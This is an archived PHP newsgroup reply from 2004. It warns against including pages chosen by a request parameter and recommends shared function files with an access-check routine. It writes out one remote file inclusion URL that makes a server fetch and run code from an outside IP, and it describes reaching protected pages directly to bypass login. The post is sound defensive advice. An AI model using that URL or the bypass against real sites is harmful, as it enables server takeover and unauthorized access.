Re: Design Model Question
From: Chung Leong (chernyshevsky_at_hotmail.com)
Date: 06/26/04
- Next message: Garp: "Re: Any girls?"
- Previous message: Geoff Berrow: "Re: Any girls?"
- In reply to: Mike Sutton: "Design Model Question"
- Next in thread: Tony Marston: "Re: Design Model Question"
- Reply: Tony Marston: "Re: Design Model Question"
- Reply: Mike Sutton: "Re: Design Model Question"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Fri, 25 Jun 2004 19:44:20 -0400
"Mike Sutton" <sutton128@yahoo.com> wrote in message
news:7eb017e9.0406251338.35a2900d@posting.google.com...
>
> The questions are:
> Can anyone provide opinions on advantages/disadvantages to each of
> these models?
> Can anyone provide the correct terminology to discuss these ideas so
> that I can look for more, relevant resources.
I was just talking about this in another thread. DON'T USE THE SINGLE ENTRY
POINT ARCHITECTURE! It offers no advantages at all, while its disadvantages
are numerous. First and foremost, this architecture is one of the leading
causes of security breach in PHP site. By setting $page to an Internet
address (http://www.example.net/page=http://128.34.123.34/hack.txt), I can
run arbitrary code on your server. And I can bypass your authentication
scheme by simply typing in the address to the file that you're including
(http://www.example.net/AccountIndex.php).
People who use this kind of scheme, I dare say, don't have a strong
programming background. Those who have programmed in C/C++ or other
procedural languages know that you include a file to make additional
functionalities available, not to cause something to occur. Think about it,
when you use require() you're just stating the file is needed by the current
script.
The proper way to share code between script is to enclose it in functions,
keep these in an separate file, include it where it's needed, then call the
functions. Or for the sake of convinence, just include it in every script.
Here's an example setup: We have a file call global.php that's included into
every script. This file in turn, includes files with commonly used
functions.
global.php:
<?
require("../inc/auth.php");
require("../inc/interface.php");
require("../inc/db.php");
...
//error_reporting(E_ALL);
define(DEBUG, false);
?>
accountIndex.php:
<?
require("global.php");
RestrictAccess();
PrintHeader("Accounting");
PrintFooter();
?>
inc/auth.php
<?
function RestrictAccess($level = 5) {
if(empty($_SESSION["logged_$level"])) {
Redirect("login.php?level=$level");
}
}
?>
In this system, it's easy to have pages that require the user to log in and
others that do not. If you don't call RestrictAccess() then there's no
restriction. And it's easy to implement multi-level security. Just pass a
value to the function instead of employing the default if the page needs
extra security.
- Next message: Garp: "Re: Any girls?"
- Previous message: Geoff Berrow: "Re: Any girls?"
- In reply to: Mike Sutton: "Design Model Question"
- Next in thread: Tony Marston: "Re: Design Model Question"
- Reply: Tony Marston: "Re: Design Model Question"
- Reply: Mike Sutton: "Re: Design Model Question"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Relevant Pages
|
